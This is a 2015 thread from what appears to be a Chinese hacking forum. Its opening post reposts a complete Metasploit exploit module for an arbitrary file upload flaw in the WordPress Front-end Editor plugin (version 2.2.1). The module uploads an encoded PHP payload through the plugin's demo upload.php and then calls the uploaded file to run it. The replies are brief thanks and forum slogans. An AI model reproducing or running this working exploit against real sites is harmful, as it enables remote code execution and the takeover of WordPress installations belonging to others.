90_ 发表于 2015-6-18 20:41:51

Wordpress Front-end Editor上传漏洞

Description:
The Wordpress Front-end Editor plugin contains an authenticated file upload vulnerability. We can upload arbitrary files to the upload folder, because the plugin also uses it's own file upload mechanism instead of the wordpress api it's possible to upload any file type.


##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::HTTP::Wordpress
include Msf::Exploit::FileDropper

def initialize(info = {})
    super(update_info(
      info,
      'Name'         => 'Wordpress Front-end Editor File Upload',
      'Description'    => %q{
          The Wordpress Front-end Editor plugin contains an authenticated file upload
          vulnerability. We can upload arbitrary files to the upload folder, because
          the plugin also uses it's own file upload mechanism instead of the wordpress
          api it's possible to upload any file type.
      },
      'Author'         =>
      [
          'Sammy', # Vulnerability discovery
          'Roberto Soares Espreto <robertoespretogmail.com>'   # Metasploit module
      ],
      'License'      => MSF_LICENSE,
      'References'   =>
      [
          ['OSVDB', '83637'],
          ['WPVDB', '7569'],
          ['URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-front-end-editor-arbitrary-file-upload-vulnerability.html']
      ],
      'Privileged'   => false,
      'Platform'       => ['php'],
      'Arch'         => ARCH_PHP,
      'Targets'      => [['Front-End Editor 2.2.1', {}]],
      'DefaultTarget'=> 0,
      'DisclosureDate' => 'Jul 04 2012'))
end

def check
    check_plugin_version_from_readme('front-end-editor', '2.3')
end

def exploit
    print_status("#{peer} - Trying to upload payload")
    filename = "#{rand_text_alpha_lower(5)}.php"

    print_status("#{peer} - Uploading payload")
    res = send_request_cgi(
      'method'   => 'POST',
      'uri'      => normalize_uri(wordpress_url_plugins, 'front-end-editor', 'lib', 'aloha-editor', 'plugins', 'extra', 'draganddropfiles', 'demo', 'upload.php'),
      'ctype'    => 'application/octet-stream',
      'headers'=> {
      'X-File-Name' => "#{filename}"
      },
      'data' => payload.encoded
    )

    if res
      if res.code == 200
      register_files_for_cleanup(filename)
      else
      fail_with(Failure::Unknown, "#{peer} - Unexpected response, exploit probably failed!")
      end
    else
      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
    end

    print_status("#{peer} - Calling uploaded file #{filename}")
    send_request_cgi(
      { 'uri'    => normalize_uri(wordpress_url_plugins, 'front-end-editor', 'lib', 'aloha-editor', 'plugins', 'extra', 'draganddropfiles', 'demo', "#{filename}") },
      5
    )
end
end
#

我叫齐齐 发表于 2015-6-19 19:01:39

好深奥的样子

ruguoruo 发表于 2015-6-26 23:05:23

感谢楼主的分享~

Sty,涛 发表于 2015-6-27 09:52:56

支持中国红客联盟(ihonker.org)

ruguoruo 发表于 2015-6-27 13:53:58

支持中国红客联盟(ihonker.org)

小路 发表于 2015-6-28 02:09:41

感谢楼主的分享~

小路 发表于 2015-6-28 06:02:08

学习学习技术,加油!

r00tc4 发表于 2015-6-28 23:24:23

学习学习技术,加油!

Jack-5 发表于 2015-6-29 05:32:16

学习学习技术,加油!

云游者 发表于 2015-6-30 00:22:37

还是不错的哦,顶了
页: [1] 2 3 4 5 6 7 8 9
查看完整版本: Wordpress Front-end Editor上传漏洞